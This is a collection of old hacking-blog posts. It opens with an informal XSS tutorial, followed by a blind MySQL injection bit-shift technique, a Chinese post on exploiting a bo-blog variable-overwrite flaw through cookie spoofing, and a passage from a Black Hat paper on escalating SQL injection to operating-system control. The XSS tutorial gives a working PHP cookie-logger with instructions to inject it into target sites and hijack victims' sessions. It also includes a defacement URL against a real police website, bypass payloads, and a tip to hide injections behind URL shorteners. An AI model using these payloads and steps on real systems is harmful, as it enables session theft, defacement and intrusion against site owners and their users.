\_ 4.) Cookie stealing
\_ 5.) Defacing
\_ Xss Cheat Sheet
0×06 : Fixing Xss Holes
0×07: [The End]
|_| Conclusions

<~-.,~~~~~~~~~~~~~~~~~~~~~~~~~~~~,.-~>

———————
0×01: Introduction :
———————

xss also termed as css , no its not Cascading Style Sheets . xss is an abbreviation for cross site scripting . From The title itself its clear xss is related to scripts to be precise its javascripts . xss is a very common attackt found in web applications . ‘XSS’ allows the attacker to INSERT malicous code . The attacker can inject his malicious script into a website, and the browser just run’s the code or script. XSS flaws comes up every time a website doesn’t filter the attackers input.

There are many types of XSS attacks, I will mention 3 of the most used.

The First Attack i wana talk about is ‘URL XSS’ this means that the XSS wont stay on the page
it will only get executed if you have the malicous code in the URL and submit the url
we will talk more on how to use this in our advantage.

The Second Attack is input fields, Where ever you can insert data, it is very common, to be XSS
vulnerable, for example say we found a site with a search engine, Now in the search box you enter
‘hacker’ now hit enter, when the page loads, if it says your data like ‘Found 100 Results For hacker’
ok now you see its displaying out data on the page, now what if we can exexute code? there is no possible
way to execute PHP code in this Attack, but certainly is for HTML, Javascript, but be aware this method,
Also wont stay on the server, this is for your eyes only.

The Third Attack, with this attack you will be able to INSERT data (code) and it will stay on the website.
now there are 2 kinds, it depends if we can execute PHP or HTML if we can inject PHP then we can also
inject HTML but NOT vice versa, Ok this kinda attack is normally found on Blogs, Shoutboxes, Profiles
Forums, just most places where you insert data and it stays there. now HTML is totally diffrent then PHP
HTML downloads to your pc and then your ‘Browser’ parses/interprets the code, (thats why its source is viewable)
With PHP the code is interpretued on the server the script is hosted on, then the data is returned to the browser.
for PHP injection its rare, But it dont harm to try. Note: PHP code cant be injected into HTML page !!!

——————————————
x02: Finding The xss Vulnerable Websites :
——————————————
This Wont be a tedious task if you have a good eye !
It is not really a big issue UNLESS it was permanent! Most Of the websites you come up with are vulnerable , the thing you need to have is just good knowledge about how to bypass the filteration . well , there are many techniques like
magic_quotes_gpc=ON bypass
HEX encoding
Obfuscation
Trying around
i will discuess them later !!

To Kick off start finding xss vulnerables you can check blogs,forums,comment boxes , shout boxes and anykinda input boxes !! . Dont Worry google will help us finding the websites . Using goole dork inurl:”search.php?q=” , we can get a list of common websites you can now try them !!
——————————-
0×03 : Executing Xss Commands
——————————

Injecting Xss script is a easy task as said above just you have to look for an input box !!

Let’s say this is how a simple, unsecured search function looks like:

a vulnerable code would be:

<*?php

$message = $_POST['message'];

if (isset($_POST['message']))
{

echo “Thank you, your message has been posted!”;

echo ”
“;

echo $message;
}

echo ”
<*form method=’post’ name=’message_box’>
<*input type=’text’ name=’message’>
<*input type=’submit’ name=’submit’>
<*/form>";

ok, so now a malicious user could do the following:

submit the following text to test for vulnerability :

<*script>alert(“xss”)<*/script>

<*h1>Nice Website!<*/h1>

IF the HTML gets parsed “and it will in this code” , the attacker will now move to the next step, which is logging the page.. by redirecting it to a logger..

some methods of bypassing some filters, for example, if the form only submits links, lets take this one as an example:

<*?php

$message = $_POST['message'];

if (isset($_POST['message']))
{

echo “Thank you, your link has been added!”;

echo “<*br />”;

echo “<*a href=’$message’>Link<*/a>”;;
}

echo ”
<*form method=’post’ name=’message_box’>
<*input type=’text’ name=’message’>
<*input type=’submit’ name=’submit’>
<*/form>";

now that should not parse anything, but simply wrap it in a link right?

well, i don’t think so, you can simply bypass it using:

‘> <*script>alert(“owned”)<*/script>

why does that bypass it?!

here is what happens, the

‘>

will stop the a tag, and then you can open anything else…

here is the result:

<*a href=”> <*script>alert(“owned”)<*/script>’>Link<*/a>

as you can see, the a tag got closed, which allowed me to open another tag, which is a script here. and it works :)

———————————————
0×04 : Bypass techniques
———————————————

As Said in section 0×02 , Here i am going to discuss about bypass techniques :)

There are a lot of ways to bypass XSS filters on websites, I’ll number some:

\_ 1.) magic_quotes_gpc=ON bypass
\_ 2.) HEX encoding
\_ 3.) Obfuscation
\_ 4.) Trying around

1.) magic_quotes_gpc=ON is a php setting (php.ini).
It causes that every ‘ (single-quote), ” (double quote) and \ (backslash)
are escaped with a backslash automatically. It’s also a well known method
to avoid XSS flaws, although it’s exploitable.

How to bypass it when it’s ON? – use the javascript function called
String.fromCharCode(), just convert your text in decimal characters
(e.g. here: http://www.asciizeichen.de/tabelle.html) and put them in the handling.

Using “ankit” (without quote sign) will look like this:

String.fromCharCode(97, 110, 107, 105,116)

now insert this in your alert script:

www.site.ru/google.php?search=

2.) HEX encoding is a useful bypass method, too. Using this step will encode
your script, so you can’t see clearly on the first look what the code will cause.
This is how

looks like encrypted in HEX:

www.site.ru/google.php?search=%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%2F%74%75%72%74%6C%65%73%2F%29%3B%3C%2F%73%63%72%69%70%74%3E

3.) Obfuscation – sometimes website administrator simply put words like
“script”,”alert()”,””” on the “badwords list”, that means, when you
search for “script” on the website, it just shows you an error, like
“you are not allowed to search for this word” or something.
but this is a weak protection, you can bypass it using obfuscation.
your javascript code like:

There are like unlimited possibilities, but that leads us to the
next chapter…

4.) Trying around: sometimes you just got to try around, because every website
is secured/unsecured in a different, unique way. Some doesn’t even use
cookies for example. Alway’s keep a look at the website’s source code!
Sometimes you need to adjust your XSS script, like:

“>

This you need sometimes if you injected your code into a searchbox e.g. and
interrupt a html tag, so you first need to close him, then start a new
tag (

www.site.ru/google.php?search=

\_ 4.) —————-
Cookie Stealing
—————-

I decided To add this part , as i have seen lot of papers , ebboks ,artciles not covering this part and if hey do add , its not clear to the readers so its here :)

Its the most usefull and vital part in xss . You Just have to Put your cookie logger script on your webspace and insert javascript into xss vulnerable with the cookielogger script address :) Rest The Script Will Do , You Will Get the cookies to eat with tea/coffee :P ..

<*?php

function GetIP()
{
if (getenv(“HTTP_CLIENT_IP”) && strcasecmp(getenv(“HTTP_CLIENT_IP"), “unknown”))
$ip = getenv(“HTTP_CLIENT_IP”);
else if (getenv(“HTTP_X_FORWARDED_FOR”) && strcasecmp(getenv(“HTTP_X_FORWARDED_FOR”), “unknown”))
$ip = getenv(“HTTP_X_FORWARDED_FOR”);
else if (getenv(“REMOTE_ADDR”) && strcasecmp(getenv(“REMOTE_ADDR"), “unknown”))
$ip = getenv(“REMOTE_ADDR”);
else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], “unknown”))
$ip = $_SERVER['REMOTE_ADDR'];
else
$ip = “unknown”;
return($ip);
}

function logData()
{
$ipLog=”log.txt”;
$cookie = $_SERVER['QUERY_STRING'];
$register_globals = (bool) ini_get(‘register_gobals’);
if ($register_globals) $ip = getenv(‘REMOTE_ADDR’);
else $ip = GetIP();

$rem_port = $_SERVER['REMOTE_PORT'];
$user_agent = $_SERVER['HTTP_USER_AGENT'];
$rqst_method = $_SERVER['METHOD'];
$rem_host = $_SERVER['REMOTE_HOST'];
$referer = $_SERVER['HTTP_REFERER'];
$date=date (“l dS of F Y h:i:s A”);
$log=fopen(“$ipLog”, “a+”);

if (preg_match(“/\bhtm\b/i”, $ipLog) || preg_match(“/\bhtml\b/i”, $ipLog))
fputs($log, “IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE: $cookie
“);
else
fputs($log, “IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie \n\n”);
fclose($log);
}

logData();

Above is the cookie logger script . Make a tlog.txt and put both of them on your webspace and set “chmod 777″.
Inject the following code in your target website:

http://www.site.com/google.php?search=

// obviously you have to rename the name of script :) .. use a name that seems less suspecious :O

Now As soon as the user visits the page victim’s cookie will be trapped in your log file . Once You Got the cookies you can hijack there session :)

// You Can use Firefox Addons , Maybe Available for chrome too :)

——–
\_ 5.) Defacing
——–

Well now you understand how XSS works, we can explain some simple XSS deface methods, there
are many ways for defacing i will mention some of the best and most used,

the first one being IMG SCR, now for those of you who dont know html, IMG SCR is a tag, that
displays the IMAGE linked to it on the webpage.

xSsed by Ankit

Example ::

http://www.lapdonline.org/search_results/search/&view_all=1&chg_filter=1&searchType=content_basic&search_terms=%3Cb%3ExSsed%20by%20CrazyAnkit%3C/b%3E%3Chead%3E%3Cbody%3E%3CIMG%20SRC=%22http://ploader.net/files/87be7175082785f6e890497951c61ebc.jpg%22%20width=%20700%20height=%20700%3E%3C/body%3E%3C/head%3E

the other tags are not needed has the page will already have them. (rare cases they will not)

Ok it helps to make your picture big so it stands out and its clear the site got hacked.

Another method is using FLASH videos, its the same has the method below but a more stylish deface.

that will execute the flash video linked to it.

Or maybe using a pop or redirection?

// pop up

// redirecion

There Are Tons of others too I Will Add Them in Next Section “” Xss : Cheat sheet “” . The Deapth is too much that i would have to write an another paper for cheat sheet

<~-.,~~~~~~~~~~~~~~~~~~~~~~~~~~,.-~>
Cheat Sheets
<~-.,~~~~~~~~~~~~~~~~~~~~~~~~~~~~,.-~>

Here is the XSS cheat sheet, where I got most of them from http://ha.ckers.org/xss.html.
Enjoy. !!

”;!–”=&{()}

”>

ascript:alert(‘XSS’);”>

#############################################################
#                                                           #
# PROTIP FOR EVERY XSS INJECTION:                           #
# use url shortener services such as tinyurl.com or bit.ly #
# to ‘hide’ your injection, so the victim won’t know what’s #
# behind that url.                                          #
#                                                           #
#############################################################

==xx==xx==xx==xx==xx==

—————-
0×06 : Fixing Xss Holes
—————-

This Section is written for developers ,i mean web developers ;) . i will introduce with facts how can you secure your code
well , i found this section to be most mind bending still i have written the best i can .. [i am not good in explain things !!]

please go to this URL for more info about this

####################################################################################

http://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet

####################################################################################

well, leaving useless talks lets talk about xss prevention :)

If you found XSS bugs in your scripts, its easy to secure, take a look at the below code

if(isset($_POST['form'])){echo “” .$_POST['form']. “”;}

Ok say the variable $_POST['from'] was coming from a input box, then you have a XSS attack.
the following is a very easy way to secure that.

$charset=’UTF-8′; $data = htmlentities ($_POST['form'], ENT_NOQUOTES, $charset);
if(isset($data)){echo “” .$data. “”;}

now that will take all possible code and make it not executable. by turning it into stuff like
< ect…

You will not notice a diffrence when using htmlentries();

there are also another common function, striptags(), find more info at php.net/striptags

ok another way to show you how to secure INTEGER variables. (variables that will always contain a INT)

$this = $_GET['id'];
echo “you are viewing ” . $this . “blog”;

now if we include ?id=
into the url its gona execute our code, a very easy way to secure this is using (int) check the following code

$this = (int)$_GET['id'];
echo “you are viewing ” . $this . “blog”;

now if at anytime the varible contains anything but a Integer, it will return 0.

Thats enough said. huh !!

————————————–
0×07: XSS The Complete Walkthrough [The End]
————————————–
|_| Conclusions

Well i have talked about xss !!i hope you have enjoyed my paper a lot while reading like i enjoyed [ believe me i am lying lol !! :D]

If you got any questions mail me @ koolankit1993@gmail.com

I still have not included many topics in my paper like clicjacking with xss and vbSEO – From XSS to Reverse PHP Shell :P and few more :)
i will write a seprate paper on xss prevention later on :)

This is a very cute attack , enjoy it at its best !!

*************
EoF

Faster Blind MySQL Injection Using Bit Shifting

admin — Mon, 04 Apr 2011 12:34:19 +0000

Faster Blind MySQL Injection Using Bit Shifting
###
# http://h.ackack.net/faster-blind-mysql-injection-using-bit-shifting.html for a HTML version
# Made by Jelmer de Hen
# H.ackAck.net
#####

While strolling through mysql.com I came across this page http://dev.mysql.com/doc/refman/5.0/en/bit-functions.html.

There you can view the possibility of the bitwise function right shift.

A bitwise right shift will shift the bits 1 location to the right and add a 0 to the front.

Here is an example:

mysql> select ascii(b’00000010′);
+——————–+
| ascii(b’00000010′) |
+——————–+
| 2 |
+——————–+
1 row in set (0.00 sec)

Right shifting it 1 location will give us:

mysql> select ascii(b’00000010′) >> 1;
+————————-+
| ascii(b’00000010′) >> 1 |
+————————-+
| 1 |
+————————-+
1 row in set (0.00 sec)

It will add a 0 at the front and remove 1 character at the end.
00000010 = 2
00000010 >> 1 = 00000001
^ ^
0 shifted

So let’s say we want to find out a character of a string during blind MySQL injection and use the least possible amount of requests and do it as soon as possible we could use binary search but that will quickly take a lot of requests.
First we split the ascii table in half and try if it’s on 1 side or the other, that leaves us ~64 possible characters.
Next we chop it in half again which will give us 32 possible characters.
Then again we get 16 possible characters.
After the next split we have 8 possible characters and from this point it’s most of the times guessing or splitting it in half again.

Let’s see if we can beat that technique by optimizing this – but first more theory about the technique I came up with.

There are always 8 bits reserved for ASCII characters.
An ASCII character can be converted to it’s decimal value as you have seen before:

mysql> select ascii(‘a’);
+————+
| ascii(‘a’) |
+————+
| 97 |
+————+
1 row in set (0.00 sec)

This will give a nice int which can be used as binary.

a = 01100001

If we would left shift this character 7 locations to the right you would get:

00000000

The first 7 bits are being added by the shift, the last character remains which is 0.

mysql> select ascii(‘a’) >> 7;
+—————–+
| ascii(‘a’) >> 7 |
+—————–+
| 0 |
+—————–+
1 row in set (0.00 sec)

a = 01100001

01100001 >> 7 == 00000000 == 0
01100001 >> 6 == 00000001 == 1
01100001 >> 5 == 00000011 == 3
01100001 >> 4 == 00000110 == 6
01100001 >> 3 == 00001100 == 12
01100001 >> 2 == 00011000 == 24
01100001 >> 1 == 00110000 == 48
01100001 >> 0 == 01100001 == 97

When we did the bitshift of 7 we had 2 possible outcomes – 0 or 1 and we can compare it to 0 and 1 and determine that way if it was 1 or 0.

mysql> select (ascii(‘a’) >> 7)=0;
+———————+
| (ascii(‘a’) >> 7)=0 |
+———————+
| 1 |
+———————+
1 row in set (0.00 sec)

It tells us that it was true that if you would shift it 7 bits the outcome would be equal to 0.
Once again, if we would right shift it 6 bits we have the possible outcome of 1 and 0.

mysql> select (ascii(‘a’) >> 6)=0;
+———————+
| (ascii(‘a’) >> 6)=0 |
+———————+
| 0 |
+———————+
1 row in set (0.00 sec)

This time it’s not true so we know the first 2 bits of our character is “01″.
If the next shift will result in “010″ it would equal to 2; if it would be “011″ the outcome would be 3.

mysql> select (ascii(‘a’) >> 5)=2;
+———————+
| (ascii(‘a’) >> 5)=2 |
+———————+
| 0 |
+———————+
1 row in set (0.00 sec)

It is not true that it is 2 so now we can conclude it is “011″.
The next possible options are:
0110 = 6
0111 = 7

mysql> select (ascii(‘a’) >> 4)=6;
+———————+
| (ascii(‘a’) >> 4)=6 |
+———————+
| 1 |
+———————+
1 row in set (0.00 sec)

We got “0110″ now and looking at the table for a above here you can see this actually is true.
Let’s try this on a string we actually don’t know, user() for example.

First we shall right shift with 7 bits, possible results are 1 and 0.

mysql> select (ascii((substr(user(),1,1))) >> 7)=0;
+————————————–+
| (ascii((substr(user(),1,1))) >> 7)=0 |
+————————————–+
| 1 |
+————————————–+
1 row in set (0.00 sec)

We now know that the first bit is set to 0.
0???????

The next possible options are 0 and 1 again so we compare it with 0.

mysql> select (ascii((substr(user(),1,1))) >> 6)=0;
+————————————–+
| (ascii((substr(user(),1,1))) >> 6)=0 |
+————————————–+
| 0 |
+————————————–+
1 row in set (0.00 sec)

Now we know the second bit is set to 1.
01??????

Possible next options are:
010 = 2
011 = 3

mysql> select (ascii((substr(user(),1,1))) >> 5)=2;
+————————————–+
| (ascii((substr(user(),1,1))) >> 5)=2 |
+————————————–+
| 0 |
+————————————–+
1 row in set (0.00 sec)

Third bit is set to 1.
011?????

Next options:
0110 = 6
0111 = 7

mysql> select (ascii((substr(user(),1,1))) >> 4)=6;
+————————————–+
| (ascii((substr(user(),1,1))) >> 4)=6 |
+————————————–+
| 0 |
+————————————–+
1 row in set (0.00 sec)

This bit is also set.
0111????

Next options:
01110 = 14
01111 = 15

mysql> select (ascii((substr(user(),1,1))) >> 3)=14;
+—————————————+
| (ascii((substr(user(),1,1))) >> 3)=14 |
+—————————————+
| 1 |
+—————————————+
1 row in set (0.00 sec)

01110???

Options:
011100 = 28
011101 = 29

mysql> select (ascii((substr(user(),1,1))) >> 2)=28;
+—————————————+
| (ascii((substr(user(),1,1))) >> 2)=28 |
+—————————————+
| 1 |
+—————————————+
1 row in set (0.00 sec)

011100??

Options:
0111000 = 56
0111001 = 57

mysql> select (ascii((substr(user(),1,1))) >> 1)=56;
+—————————————+
| (ascii((substr(user(),1,1))) >> 1)=56 |
+—————————————+
| 0 |
+—————————————+
1 row in set (0.00 sec)

0111001?
Options:
01110010 = 114
01110011 = 115

mysql> select (ascii((substr(user(),1,1))) >> 0)=114;
+—————————————-+
| (ascii((substr(user(),1,1))) >> 0)=114 |
+—————————————-+
| 1 |
+—————————————-+
1 row in set (0.00 sec)

Alright, so the binary representation of the character is:
01110010

Converting it back gives us:

mysql> select b’01110010′;
+————-+
| b’01110010′ |
+————-+
| r |
+————-+
1 row in set (0.00 sec)

So the first character of user() is “r”.

With this technique we can assure that we have the character in 8 requests.

Further optimizing this technique can be done.
The ASCII table is just 127 characters which is 7 bits per character so we can assume we will never go over it and decrement this technique with 1 request per character.

Chances are higher the second bit will be set to 1 since the second part of the ASCII table (characters 77-127) contain the characters a-z A-Z – the first part however contains numbers which are also used a lot but when automating it you might just want to try and skip this bit and immediatly try for the next one.

关于boblog任意变量覆盖漏洞的利用

admin — Sun, 13 Mar 2011 15:13:37 +0000

之前的Ryat牛在《bo-blog任意变量覆盖漏洞》一文介绍了漏洞的成因，虽然没有直接给出poc或者exp，给出了一个利用可以通过data://来执行命令的方法。
但是符合条件的网站毕竟不多所以不好用，但是分析一下源码或者google一下找到个sql注射漏洞就解决了问题，通过一个注射点爆出管理员密码的md5 hash，通过暴力破解或者cookie欺骗进后台，添加管理员帐号，然后利用网上公开的那个上传的exp上传php文件，就搞定了。
但是其实根本就没有必要用那个什么上传的exp，后来可能官方已经修补了那个上传的bug，但是直接在用户管理那用户组管理那，给管理员组上传的后缀名加上php就好了。也不用添加用户，或者修改密码了，直接从正门上传php多好。

但是2.1.2 beta 2后cookie欺骗后会发现还让输入密码，问题是管理员密码破解不出来，因为大牛的安全意识都很高，用变态的密码，一度以为boblog修补了cookie漏洞。
官方： 2011/02/20 V2.1.2.0220.0 (2.1.2 beta 1) *每次会话的首次登入后台都需要验证管理员密码。 *修改了一些过滤方法，避免某些安全问题。 *实验性的与内容长度相关的垃圾信息检测方式。
但是其实还是可以进行cookie欺骗进入后台的
只不过不仅仅要
setcookie (‘userid’, ‘userid’,);
setcookie (‘userpsw’, ‘md5密文’, );
而且要
setcookie (‘adminuserid’, ‘userid’,);
setcookie (‘adminuserpsw’, ‘md5密文’, );

之后又爆出了《bo-blog任意变量覆盖漏洞二》，尽管我之前也觉得那地方有问题，自己在ubuntu下用firefox测试居然不行，之前有过经验firefox会对<等进行编码，而ie不会，于是我切换到windows下用ie浏览器测试，结果还是不行，所以就没再管，直到爆出《bo-blog任意变量覆盖漏洞二》。然后看了heige大牛的《浏览器差异带来的不仅仅是 XSS风险》才恍然大悟。自己也随便写了小程序提交才测试成功。
正好前段时间装了curl的库就整了个最简单的，可以夸张点称为《bo-blog任意变量覆盖漏洞二》的exp了或者《bo-blog任意变量覆盖漏洞二》漏洞利用程序了。
#include #include

int main(int argc,char **argv)
{
CURL *curl;
CURLcode res;
curl = curl_easy_init();
if(curl)
{
curl_easy_setopt(curl, CURLOPT_URL, argv[1]);
res = curl_easy_perform(curl);

/* always cleanup */
curl_easy_cleanup(curl);
}
printf(“\n”);
return 0;
}

Advanced SQL injection to operating system full control

admin — Thu, 17 Feb 2011 12:26:10 +0000

From:http://www.blackhat.com/presentations/bh-europe-09/Guimaraes/Blackhat-europe-09-Damele-SQLInjection-slides.pdf

Advanced SQL injection to operating system full control
Bernardo Damele Assumpção Guimarães
bernardo.damele@gmail.com
April 10, 2009

This white paper discusses the security exposures of a server that occur due to a SQL injection flaw in a web application that communicate with a database.
Over ten years have passed since a famous hacker coined the term SQL injection and it is still considered one of the major application threats.A lot has been said on this vulnerability, but not all of the aspects and implications have been uncovered, yet.
This paper aim is to collate some of the existing knowledge, introduce new techniques and demonstrate how to get complete control over the database management system’s underlying operating system, file system and internal network through a SQL injection vulnerability in over-looked and theoretically not exploitable scenarios.

Contents
I Introduction
1 SQL injection
2 Web application scripting languages
2.1 Batched queries
3 Batched queries via SQL injection
3.1 MySQL
3.2 PostgreSQL
3.3 Microsoft SQL Server

II File system access
4 Read access
4.1 MySQL
4.2 PostgreSQL
4.3 Microsoft SQL Server
5 Write access
5.1 MySQL
5.2 PostgreSQL
5.3 Microsoft SQL Server
III Operating system access
6 User-Defined Function
7 UDF injection
7.1 MySQL
7.1.1 Shared library creation
7.1.2 SQL injection to command execution
7.2 PostgreSQL
7.2.1 Shared library creation
7.2.2 SQL injection to command execution
8 Stored procedure
8.1 Microsoft SQL Server
8.1.1 xp_cmdshell procedure
8.1.2 SQL injection to command execution

IV Out-of-band connection
9 Stand-alone payload stager
9.1 Payload stager options
9.2 Session
10 SMB relay attack
10.1 Universal Naming Convention
10.2 Abuse UNC path requests
10.2.1 MySQL
10.2.2 PostgreSQL
10.2.3 Microsoft SQL Server

11 Stored procedure buffer overflow
11.1 Exploit
11.2 Memory protection
11.3 Bypass DEP

V Privilege escalation
VI Conclusion
12 Acknowledgments

Part I
Introduction
SQL injection attack is not new.
The basic concept behind this attack has been described over ten years ago by Jeff Forristal
1 on Phrack2 issue 54[74].

The Open Web Application Security Project 3 stated in the OWASP Top Ten project4 that injection flaws[58], particularly SQL injection, is the most common and dangerous web application vulnerability, second only to Cross Site Scripting.
The question now is: “How far can an attacker go by exploiting a SQL injection? ”
This is addressed in this paper.

1 SQL injection
The OWASP Guide[57] defines SQL injection as follows:
A SQL injection attack consists of insertion or “injection” of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system. SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to effect the execution of predefined SQL commands.

Although a common problem with web applications, this vulnerability can actually affect any application that communicates with a database management system via Structured Query Language .

A SQL injection occurs when the application fails to properly sanitize user-supplied input used in SQL queries. In this way an attacker can manipulate the SQL statement that is passed to the back-end database management system. This statement will run with the same permissions as the application that executed the query. From now on I will refer to this user as session user.
———————————
1 Jeff Forristal, also known as RFP and rain.forest.puppy, is an old school hacker currently employed at Zscaler Cloud Security. He is also famous for his personal Full Disclosure Policy.
2 Phrack is an electronic magazine written by and for hackers first published November 17, 1985.
3 The Open Web Application Security Project (OWASP) is a worldwide free and open community focused on improving the security of application software.
4 The OWASP Top Ten represents a broad consensus about what the most critical web application
security flaws are. Project members include a variety of security experts from around the world who have shared their expertise to produce this list.
5 Structured Query Language (SQL) is a database computer language designed for the retrieval and management of data in relational database management systems (RDBMS), database schema creation and modification, and database object access control management.
———————————
Modern database management systems are powerful applications.They usually provide built-in instruments to interact with the underlying file system and, in some cases, with the operating system. However, when they are absent, a motivated attacker can still access the file system and execute arbitrary commands on the underlying system: this paper will walk through how this can be achieved via a SQL injection vulnerability, focusing on web-based applications.

2 Web application scripting languages
There are many web application dynamic scripting languages:
some of the most consolidated and used are PHP6 , ASP7 and ASP.NET8 .
All of these languages have pro and cons from either a web developer or a penetration tester perspective.
They also have built-in or third-party connectors to interact with database management systems via SQL.
A vast majority of web applications store and retrieve data from databases via SQL statements.
On PHP, I used native functions used to connect and query the DBMS.
On ASP, I used third-party connectors:
MySQL Connector/ODBC 5.1 [54] for MySQL and PostgreSQL ANSI driver for PostgreSQL.
On ASP.NET, I also used third-party connectors:
Connector/Net 5.2.5 [53] for MySQL and Npgsql 1.0.1 [73] driver for PostgreSQL.
The third-party connectors are available from database software vendors’ websites.

2.1 Batched queries
In Structured Query Language, batched queries, also known as stacked queries, is the ability to pass multiple SQL statements, separated by a semicolon, to the database.
These statements will then be executed sequentially from left to right by the DBMS.
Even though they are not related to one another, failure of one will cause the following statements to not be evaluated.
The following one is an example of batched queries:
SELECT col FROM table1 WHERE id=1; DROP table2
PHP, ASP and ASP.NET scripting languages do support batched queries when interacting with the back-end DBMS with a couple of exceptions.

———————————
6 PHP is a scripting language originally designed for producing dynamic web pages. It has evolved
to include a command line interface capability and can be used in standalone graphical appli-
cations.
7 Active Server Pages (ASP), also known as Classic ASP, was Microsoft’s first server-side script
engine for dynamically-generated web pages.
8 ASP.NET is a web application framework developed and marketed by Microsoft to allow pro-
grammers to build dynamic web sites, web applications and web services.
———————————

The following table clarifies where batched queries are supported in a default installation.
___________________________________
|           |       |       |       |
|             | ASP   |ASP.NET| PHP   |
|___________|_______|_______|_______|
|           |       |       |       |
|MySQL       |   No   |   Yes   |   No   |
|___________|_______|_______|_______|
|           |       |       |       |
|PostgreSQL   |   Yes   |   Yes   |   Yes   |
|___________|_______|_______|_______|
|           |       |       |       |
|MSSQLServer|   Yes   |   Yes   |   Yes   |
|___________|_______|_______|_______|

Figure 1: Programming languages and their support for batched queries Batched queries functionality is a key step for the understanding of this research.

3 Batched queries via SQL injection
Testing for batched queries support in the web application via SQL injection can be done by appending to the vulnerable parameter, a SQL statement that delays the back-end DBMS responding. This can be achieved by calling a sleep function or by performing a heavy SELECT that takes time to return, this technique is also known as “heavy queries blind SQL injection”.

3.1 MySQL

It is necessary to fingerprint the DBMS software version before testing for batched 5.0.12 introduced[36] the SLEEP()[42] function whereas on BENCHMARK()[43] function (a heavy queries blind SQL injection) queries support: MySQL previous versions the could be abused.
3.2 PostgreSQL
It is necessary to fingerprint the DBMS software version before testing for batched queries support: PostgreSQL on previous versions the 8.2 introduced[60] the PG_SLEEP()[61] function whereas generate_series()[62] function (a heavy query blind SQL injection) could be abused.
The attacker could also create a custom system built-in libc SLEEP() function from the operating
library.
3.3 Microsoft SQL Server
Microsoft SQL server has a built-in statement for delaying the response from the DBMS: WAITFOR[32]
used with its argument DELAY followed by time (e.g. WAITFOR DELAY ’0:0:5′).

Part II File system access

In this section I explain how to exploit a SQL injection to get read and write access on the back-end DBMS underlying file system.
Depending upon the configuration, it can be very complex to do and may require attention to the limits imposed by both the DBMS architecture and the web application.
4 Read access
During a penetration test it can be very useful to have read access to files on the compromised machine: it can lead to disclosure of information that helps the attacker to perform further attacks as it can lead to sensible users’ information leakage.
4.1 MySQL
MySQL has a built-in function that allows the reading of text or binary files on the underlying file system:LOAD_FILE()[44].
The session user must have the following privileges[45]:
FILE and CREATE TABLE for the support table (only needed via batched queries).
On Linux and UNIX systems, the file must be owned by the user that started the MySQL process (usually mysql) or be world-readable. On Windows, MySQL runs by default as Local System, so via the database management system it is possible to read any existing file.

The file content can be retrieved via either UNION query, blind or error based SQL injection technique.However, there are some limitations to consider when calling the LOAD_FILE() function:
•The maximum length of file characters displayed is 5000 if the column data-type where the file content is appended is varchar;
•The content is truncated to a few characters in many cases when it is retrieved via error based SQL injection technique;
•The file can be in binary format (e.g. an ELF on Linux or a portable executable on Windows) and, depending on the web application language, it can not be displayed within the page content via UNION query or error based SQL injection technique.
To bypass these limitations the steps are:

•Via batched queries:

Create a support table with one field, data-type longtext;
Use LOAD_FILE() function to read the file content and redirect via INTO DUMPFILE[48] the corresponding hexadecimal encoded[47] string value into a temporary file;
Use LOAD DATA INFILE[46] to load the temporary file content into the support table.

•Via any other SQL injection technique:
Retrieve the length of the support table’s field value;
Dump the support table’s field value in chunks of 1024 characters.

Now the chunks need to be assembled into a single hexadecimal encoded string which then needs to be decoded and written on a local file.

4.2 PostgreSQL

PostgreSQL has a built-in statement that allows the copying of text file from the underlying file system to a table’s text field:COPY[63].

The session user must be a super user to call this statement .9
The file must be owned by the user that started the PostgreSQL process (usually postgres) or be world-readable.
The file content can be retrieved via either UNION query, blind or error based SQL injection technique. However, the web application programming language must support batched queries.

he steps are:
•Via batched queries:
Create a support table with one field, data-type bytea;
Use COPY statement to load the content of the text file into the support table.

•Via any other SQL injection technique:
Count the number of entries in the support table;
Dump the support table’s field entries base64 encoded via ENCODE function[64].

Now the dumped entries need to be assembled into a single base64 encoded string which then needs to be decoded and written on a local file.
The COPY statement can not be used to read binary files since PostgreSQL 7.4:although a custom user-defined function can be used to read binary files instead.
This user-defined function takes in input a binary file and output its content as an hexadecimal encoded string on a temporary text file. The attacker can then proceed to read this text file as detailed above.
—————————
9 There is also a native function which aim is to read files, lo_import()[66], but it returns an OID that can later be passed as an argument to lo_export() function[66] to point to the referenced file and copy its content to another file path: It does not return the content so these two functions can not be used to read file via SQL injection.
—————————
4.3 Microsoft SQL Server
Microsoft SQL Server has a built-in statement that allows the insertion of either a
text or a binary files content from the file system to a table’s VARCHAR field: BULK INSERT[33].
The session user must have the following privileges:INSERT, ADMINISTER BULK OPERATIONS and CREATE TABLE.

Microsoft SQL Server 2000 runs by default as Administrator,so the database management system can read any existing file. This is the same on Microsoft SQL Server 2005 and 2008 when the database administrator has configured it to run either as Local System (SYSTEM) or as Administrator,otherwise the file must be world-readable which happens very often on Windows.
The file content can be retrieved via either UNION query, blind or error based SQL injection technique. However, the web application programming language must support batched queries.
The steps are:
•Via batched queries:
Create a support table (table1) with one field, data-type text;
Create another support table (table2) with two fields, one data-type INT IDENTITY(1, 1) PRIMARY KEY and the other data-type VARCHAR(4096);
Use BULK INSERT statement to load the content of the file as a single entry into the support table table1;
Inject SQL code to convert[27] the support table table1 entry into its hexadecimal encoded value then INSERT 4096 characters of the encoded string into each entry of the support table table2.
•Via any other SQL injection technique:
Count the number of entries in the support table table2;
Dump the support table table2′s varchar field entries sorted by PRIMARY KEY field.

Now the entries need to be assembled into a single hexadecimal encoded string which then needs to be decoded and written on a local file.

5 Write access

A strong proof of success of a penetration test is the ability to write on the underlying file system, as well as the execution of arbitrary commands. This will be explained later in the paper.
5.1 MySQL
MySQL has a built-in SELECT clause that allows the outputting of data into a file: INTO DUMPFILE[48].

The session user must have the following privileges:
FILE and INSERT, UPDATE and CREATE TABLE for the support table (only needed via batched queries).

